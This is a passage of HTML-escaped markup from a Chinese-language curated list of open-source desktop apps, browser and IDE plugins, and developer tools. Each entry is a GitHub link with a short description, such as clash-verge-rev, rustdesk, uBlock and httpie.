            &lt;a href=&quot;https://github.com/clash-verge-rev/clash-verge-rev&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;clash-verge-rev&lt;/a&gt; - 一个基于 &lt;code&gt;Tauri&lt;/code&gt; 的 &lt;code&gt;Clash&lt;/code&gt; 客户端软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lizongying/my-tv&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;my-tv&lt;/a&gt; - 电视直播软件，安装即可使用。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kingToolbox/WindTerm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WindTerm&lt;/a&gt; - 一个更快、更好的 &lt;code&gt;SSH/Telnet/Serial/Shell/Sftp&lt;/code&gt; 客户端，适用于 &lt;code&gt;DevOps&lt;/code&gt;.
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mihonapp/mihon&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mihon&lt;/a&gt; - 一个免费的开源漫画阅读器，适用于 &lt;code&gt;Android&lt;/code&gt; 平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/rubickCenter/rubick&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;rubick&lt;/a&gt; - 基于 &lt;code&gt;Electron&lt;/code&gt; 的开源工具箱，自由集成丰富插件。&lt;a href=&quot;https://rubickcenter.github.io/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/DinoChan/Loaf&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Loaf&lt;/a&gt; - 一个摸鱼软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/srwi/EverythingToolbar&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;EverythingToolbar&lt;/a&gt; - &lt;code&gt;Windows&lt;/code&gt; 系统搜索工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lihaoyun6/QuickRecorder&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;QuickRecorder&lt;/a&gt; - 多功能、轻量化、高性能的 &lt;code&gt;macOS&lt;/code&gt; 屏幕录制工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/flameshot-org/flameshot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;flameshot&lt;/a&gt; - 强大而简单易用的截图软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jgraph/drawio-desktop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;drawio-desktop&lt;/a&gt; - 一个基于 &lt;code&gt;Electron&lt;/code&gt; 的图表和白板桌面应用程序，它包装了核心的 &lt;code&gt;draw.io&lt;/code&gt; 编辑器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/VREMSoftwareDevelopment/WiFiAnalyzer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WiFiAnalyzer&lt;/a&gt; - 分析 &lt;code&gt;WiFi&lt;/code&gt; 信号的 &lt;code&gt;Android&lt;/code&gt; 应用程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/niedev/RTranslator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RTranslator&lt;/a&gt; - 一款开源、免费、离线的 &lt;code&gt;Android&lt;/code&gt; 实时翻译应用程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/4gray/iptvnator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;iptvnator&lt;/a&gt; - 一款视频播放器应用程序，提供对 &lt;code&gt;IPTV&lt;/code&gt; 播放列表（&lt;code&gt;m3u&lt;/code&gt;、&lt;code&gt;m3u8&lt;/code&gt;）播放的支持。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chen08209/FlClash&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;FlClash&lt;/a&gt; - 基于 &lt;code&gt;ClashMeta&lt;/code&gt; 的多平台代理客户端，简单易用，开源无广告。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;span style=&quot;text-decoration:line-through;&quot;&gt;&lt;a href=&quot;https://github.com/tachiyomiorg/tachiyomi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tachiyomi&lt;/a&gt; - 免费、开源的 &lt;code&gt;Android&lt;/code&gt; 漫画阅读器。&lt;/span&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/telegramdesktop/tdesktop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tdesktop&lt;/a&gt; - &lt;code&gt;Telegram&lt;/code&gt; 桌面端应用程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ayangweb/EcoPaste&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;EcoPaste&lt;/a&gt; - 适用于 &lt;code&gt;Windows&lt;/code&gt;、&lt;code&gt;MacOS&lt;/code&gt; 和 &lt;code&gt;Linux&lt;/code&gt; 的开源&lt;strong&gt;剪贴板管理工具&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/aardio/gif123&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gif123&lt;/a&gt; - 极简 &lt;code&gt;GIF&lt;/code&gt; &lt;strong&gt;录屏工具&lt;/strong&gt;，可一键快速复制 &lt;code&gt;GIF&lt;/code&gt; 图像并直接粘贴到其他程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/imfile-io/imfile-desktop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;imfile-desktop&lt;/a&gt; - 一款基于 &lt;code&gt;Motrix&lt;/code&gt; 的开源下载工具，支持下载 &lt;code&gt;HTTP&lt;/code&gt;、&lt;code&gt;FTP&lt;/code&gt;、&lt;code&gt;BT&lt;/code&gt;、磁力链等资源。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/peazip/PeaZip&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PeaZip&lt;/a&gt; - 一款免费且开源的文件压缩与解压工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mifi/lossless-cut&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lossless-cut&lt;/a&gt; - 无损剪切，一款视频/音频剪切工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/massCodeIO/massCode&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;massCode&lt;/a&gt; - 一个免费开源的跨平台代码片段管理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Guovin/TV&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TV&lt;/a&gt; - &lt;code&gt;IPTV&lt;/code&gt; 电视直播源更新工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/desktop/desktop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;desktop&lt;/a&gt; - 一个基于 &lt;code&gt;Electron&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; + &lt;code&gt;React&lt;/code&gt; 开源的 &lt;code&gt;GitHub&lt;/code&gt; 应用程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/rustdesk/rustdesk&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;rustdesk&lt;/a&gt; - 远程支持和远程桌面软件，开箱即用，无需任何配置。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhongyang219/TrafficMonitor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TrafficMonitor&lt;/a&gt; - 一个用于显示当前网速、&lt;code&gt;CPU&lt;/code&gt; 及内存利用率的桌面悬浮窗软件，并支持任务栏显示，支持更换皮肤。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xushengfeng/eSearch&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;eSearch&lt;/a&gt; - 一款支持截屏、离线OCR、搜索翻译、以图搜图、贴图、录屏、滚动截屏软件。&lt;a href=&quot;https://esearch.vercel.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pot-app/pot-desktop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pot-desktop&lt;/a&gt; - 一个跨平台的划词翻译软件。&lt;a href=&quot;https://pot-app.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/CherryHQ/cherry-studio&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cherry-studio&lt;/a&gt; - 一款支持多个大语言模型（&lt;code&gt;LLM&lt;/code&gt;）服务商的桌面客户端，兼容 &lt;code&gt;Windows&lt;/code&gt;、&lt;code&gt;Mac&lt;/code&gt; 和 &lt;code&gt;Linux&lt;/code&gt; 系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wanghongenpin/proxypin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;proxypin&lt;/a&gt; - 开源免费抓包工具，支持 &lt;code&gt;Windows&lt;/code&gt;、&lt;code&gt;Mac&lt;/code&gt;、&lt;code&gt;Android&lt;/code&gt;、&lt;code&gt;IOS&lt;/code&gt;、&lt;code&gt;Linux&lt;/code&gt; 全平台系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Anxcye/anx-reader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;anx-reader&lt;/a&gt; - 使用 &lt;code&gt;Flutter&lt;/code&gt; 编写的电子书阅读器，支持多种格式。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/luqichuang/MyComic&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MyComic&lt;/a&gt; - 安卓在线漫画阅读器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gedoor/legado&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;legado&lt;/a&gt; - 一款可以自定义来源阅读网络内容的工具。&lt;a href=&quot;https://www.yuque.com/legado/wiki&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;插件项目&quot;&gt;
    &lt;a href=&quot;?id=%e6%8f%92%e4%bb%b6%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;插件项目&quot;&gt;插件项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kevmo314/magic-copy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;magic-copy&lt;/a&gt; - 基于 &lt;code&gt;Meta&lt;/code&gt; 的 &lt;code&gt;Segment Anything Model&lt;/code&gt; 从图像中&lt;strong&gt;抠图&lt;/strong&gt;并复制到剪贴板或者下载的&lt;strong&gt;谷歌浏览器插件&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/igdownloader/InstagramDownloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;InstagramDownloader&lt;/a&gt; - &lt;code&gt;Firefox&lt;/code&gt; 和 &lt;code&gt;Chrome&lt;/code&gt; 扩展，为 &lt;code&gt;Instagram&lt;/code&gt; 图片、视频创建一个下载按钮。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gorhill/uBlock&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;uBlock&lt;/a&gt; - &lt;code&gt;Chromium&lt;/code&gt; 和 &lt;code&gt;Firefox &lt;/code&gt;的广告拦截器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/immersive-translate/immersive-translate&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;immersive-translate&lt;/a&gt; - 沉浸式双语网页翻译扩展, 支持输入框翻译，鼠标悬停翻译，&lt;code&gt;PDF&lt;/code&gt;、&lt;code&gt;Epub&lt;/code&gt;, 字幕文件, &lt;code&gt;TXT&lt;/code&gt; 文件翻译。&lt;a href=&quot;https://immersivetranslate.com/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/openai-translator/openai-translator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;openai-translator&lt;/a&gt; - 基于 &lt;code&gt;ChatGPT API&lt;/code&gt; 的划词翻译浏览器插件和跨平台桌面端应用。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/DukeLuo/wai&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wai&lt;/a&gt; - 一款可以预防颈椎病的新标签页扩展。&lt;a href=&quot;https://wai.shaiwang.life/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/LeekHub/leek-fund&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;leek-fund&lt;/a&gt; - 一个支持查看股票 &amp;amp; 基金实时数据 &lt;code&gt;VSCode&lt;/code&gt; 插件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xifangczy/cat-catch&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cat-catch&lt;/a&gt; - 一个音乐/视频地址解析下载插件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/maboloshi/github-chinese&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;github-chinese&lt;/a&gt; - &lt;code&gt;GitHub&lt;/code&gt; 中文化插件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Liubsyy/JarEditor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JarEditor&lt;/a&gt; - 一个可直接修改 &lt;code&gt;Jar&lt;/code&gt; 包内文件的 &lt;code&gt;IDEA&lt;/code&gt; 插件，无需解压。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/webclipper/web-clipper&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;web-clipper&lt;/a&gt; - 可以使用 &lt;code&gt;Web Clipper&lt;/code&gt; 将 &lt;code&gt;Web&lt;/code&gt; 上的任何内容保存到任何地方。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/huage2580/leeks&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;leeks&lt;/a&gt; - &lt;code&gt;IDEA&lt;/code&gt; 插件，支持查看基金、股票（A股，港股，美股）。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hanydd/BilibiliSponsorBlock&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;BilibiliSponsorBlock&lt;/a&gt; - 一款跳过B站视频中恰饭片段的浏览器插件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kscript/markdown-download&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markdown-download&lt;/a&gt; - 将掘金、知乎、思否、简书、博客园、微信公众号、开源中国、CSDN 的文章转为 &lt;code&gt;Markdown&lt;/code&gt; 文档并下载的谷歌浏览器插件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/starcwang/easy_javadoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;easy_javadoc&lt;/a&gt; - &lt;code&gt;IntelliJ IDEA&lt;/code&gt; 插件，自动生成 &lt;code&gt;javadoc&lt;/code&gt; 文档注释。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ovity/octotree&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;octotree&lt;/a&gt; - 浏览器插件，可以按照树状图的方式展示 &lt;code&gt;Github&lt;/code&gt; 项目的结构，以及提供了快速搜索、变更预览等功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tuchg/ChinesePinyin-CodeCompletionHelper&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ChinesePinyin-CodeCompletionHelper&lt;/a&gt; - 支持拼音输入法自动补全的 &lt;code&gt;JetBrains&lt;/code&gt; 插件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/BewlyBewly/BewlyBewly&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;BewlyBewly&lt;/a&gt; - 优化 &lt;code&gt;bilibili&lt;/code&gt; 网站界面的浏览器插件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/MemoryZy/Json-Assistant&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Json-Assistant&lt;/a&gt; - 基于 &lt;code&gt;IntelliJ IDEs&lt;/code&gt; 的 &lt;code&gt;JSON&lt;/code&gt; 工具插件，让 &lt;code&gt;JSON&lt;/code&gt; 处理变得更轻松。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/wind_invade/chapter_reader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;chapter_reader&lt;/a&gt; - &lt;code&gt;IDEA&lt;/code&gt; 在线&amp;amp;本地小说阅读插件。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;工具项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%b7%a5%e5%85%b7%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;工具项目&quot;&gt;工具项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Tencent/APIJSON&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;APIJSON&lt;/a&gt; - 专为 &lt;code&gt;API&lt;/code&gt; 而生的 &lt;code&gt;JSON&lt;/code&gt; 网络传输协议以及基于这套协议实现的 &lt;code&gt;ORM&lt;/code&gt; 库。为各种增删改查提供了完全自动化的万能通用接口，零代码实时满足千变万化的各种新增和变更需求。&lt;a href=&quot;http://apijson.cn/api/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://github.com/Tencent/APIJSON/blob/master/Document.md&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wechatsync/Wechatsync&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Wechatsync&lt;/a&gt; - 一键&lt;strong&gt;同步文章&lt;/strong&gt;到多个内容平台，支持今日头条、&lt;code&gt;WordPress&lt;/code&gt;、知乎、简书、掘金、&lt;code&gt;CSDN&lt;/code&gt;、&lt;code&gt;typecho&lt;/code&gt; 各大平台，一次发布，多平台同步发布。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jaywcjlove/linux-command&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;linux-command&lt;/a&gt; - &lt;code&gt;Linux&lt;/code&gt; &lt;strong&gt;命令大全&lt;/strong&gt;搜索工具，内容包含 &lt;code&gt;Linux&lt;/code&gt; 命令手册、详解、学习、搜集。&lt;a href=&quot;https://wangchujiang.com/linux-command/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/conwnet/github1s&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;github1s&lt;/a&gt; - 在 &lt;code&gt;github&lt;/code&gt; 地址后面加上 &lt;code&gt;1s&lt;/code&gt; 实现通过 &lt;code&gt;VS Code&lt;/code&gt; 阅读 &lt;code&gt;giuthub&lt;/code&gt; 代码，并可以同步使用 &lt;code&gt;VS Code&lt;/code&gt; 快捷键。如原项目地址：&lt;a href=&quot;https://github.com/chenyl8848/springboot-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;https://github.com/chenyl8848/springboot-demo&lt;/a&gt; 加上 &lt;code&gt;1s&lt;/code&gt; &lt;a href=&quot;https://github1s.com/chenyl8848/springboot-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;https://github1s.com/chenyl8848/springboot-demo&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/httpie/httpie&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;httpie&lt;/a&gt; - 一款现代、友好的 &lt;code&gt;HTTP&lt;/code&gt; 客户端命令行工具。支持 &lt;code&gt;Json&lt;/code&gt;、自定义颜色、会话、下载，插件等。&lt;a href=&quot;https://httpie.io/cli/run&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://httpie.io/docs/cli&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mtlynch/picoshare&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;picoshare&lt;/a&gt; - 一款极简的在线开源文件分享工具。&lt;a href=&quot;https://demo.pico.rocks/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/excalidraw/excalidraw&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;excalidraw&lt;/a&gt; - 虚拟白板，用于勾画手绘般的图表。&lt;a href=&quot;https://excalidraw.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wulkano/Kap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Kap&lt;/a&gt; - 一个用网络技术构建的开源屏幕记录工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/alyssaxuu/screenity&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;screenity&lt;/a&gt; - 适用于 &lt;code&gt;Chrome&lt;/code&gt; 的强大的屏幕记录器和注释工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ahrm/sioyek&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;sioyek&lt;/a&gt; - 一个专注于技术书籍和研究论文的 &lt;code&gt;PDF&lt;/code&gt; 阅读器。&lt;a href=&quot;https://sioyek-documentation.readthedocs.io/en/latest/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/meilisearch/meilisearch&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;meilisearch&lt;/a&gt; - 一个适配应用程序、网站、工作流的快速搜索引擎。&lt;a href=&quot;https://where2watch.meilisearch.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.meilisearch.com/docs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;span style=&quot;text-decoration:line-through;&quot;&gt;&lt;a href=&quot;https://github.com/Sanster/lama-cleaner&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lama-cleaner&lt;/a&gt; - 一个基于人工智能模型驱动免费的、开源的图片工具，可以用它从图片中删除任何不需要的物体、缺陷、人物，或者擦除和替换你图片上的任何东西。&lt;a href=&quot;https://cleanup.pictures/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;&lt;/span&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Sanster/IOPaint&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;IOPaint&lt;/a&gt; - 一个基于人工智能模型驱动免费的、开源的图片工具，可以用它从图片中删除任何不需要的物体、缺陷、人物，或者擦除和替换你图片上的任何东西。&lt;a href=&quot;https://huggingface.co/spaces/Sanster/iopaint-lama&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.iopaint.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
